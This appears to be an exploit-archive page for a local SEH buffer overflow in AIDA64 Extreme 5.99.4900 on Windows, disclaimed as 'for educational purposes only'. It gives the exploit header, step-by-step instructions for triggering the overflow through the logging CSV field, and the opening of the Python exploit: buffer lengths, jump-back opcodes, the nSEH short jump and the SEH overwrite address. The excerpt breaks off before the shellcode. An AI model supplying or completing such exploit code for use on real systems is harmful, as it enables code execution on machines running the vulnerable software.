Exploits / Vulnerability Discovered : 2019-04-05 |
Type : local |
Platform : windows
This exploit / vulnerability Aida64 extreme 5.99.4900 logging seh buffer overflow is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#!/usr/bin/python #
# Exploit Title: AIDA64 Extreme 5.99.4900 - Logging SEH Buffer Overflow #
# Date: 2019-04-02 #
# Vendor Homepage: https://www.aida64.com #
# Software Link: http://download.aida64.com/aida64extreme599.exe #
# Mirror Link : https://www.nikktech.com/main/downloads/finalwire/aida64extreme599.exe #
# Exploit Author: Peyman Forouzan #
# Tested Version: 5.99.4900 #
# Tested on: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit #
# Special Thanks to my wife #
# Steps : #
# 1- Run python code : Aida64-Extreme.py ( Two files are created ) #
# 2- App --> File --> Preferences --> Hardware Monitoring --> Logging --> paste in contents from the #
# exploit-x32.txt or exploit-x64.txt (depend on your windows version) #
# into "Log sensor reading to CSV log file : " --> OK #
# 3- File --> Exit (Do not directly close the program window, If you want to do this, #
# some codes must be changed - See the comments in code) #
# --> Shellcode (Calc) open #
#---------------------------------------------------------------------------------------------------------#
bufsize1 = 1120 # for windows-x32
#bufsize1 = 1088 # for windows-x32 - if you directly close the program window
bufsize2 = 1114 # for windows-x64
#bufsize2 = 1082 # for windows-x64 - if you directly close the program window
jmpback1 = "\xe9\xa0\xfb\xff\xff" # Jmp back
#jmpback1 = "\xe9\xc0\xfb\xff\xff" # Jmp back - if you directly close the program window
jmpback2 = "\xe9\xa6\xfb\xff\xff" # Jmp back
#jmpback2 = "\xe9\xc6\xfb\xff\xff" # Jmp back- if you directly close the program window
nseh = "\xeb\xf9\x90\x90" # Jmp Short back
seh = "\x02\xeb\x1a\x01" # Overwrite Seh # 0x011aeb02 : {pivot 8}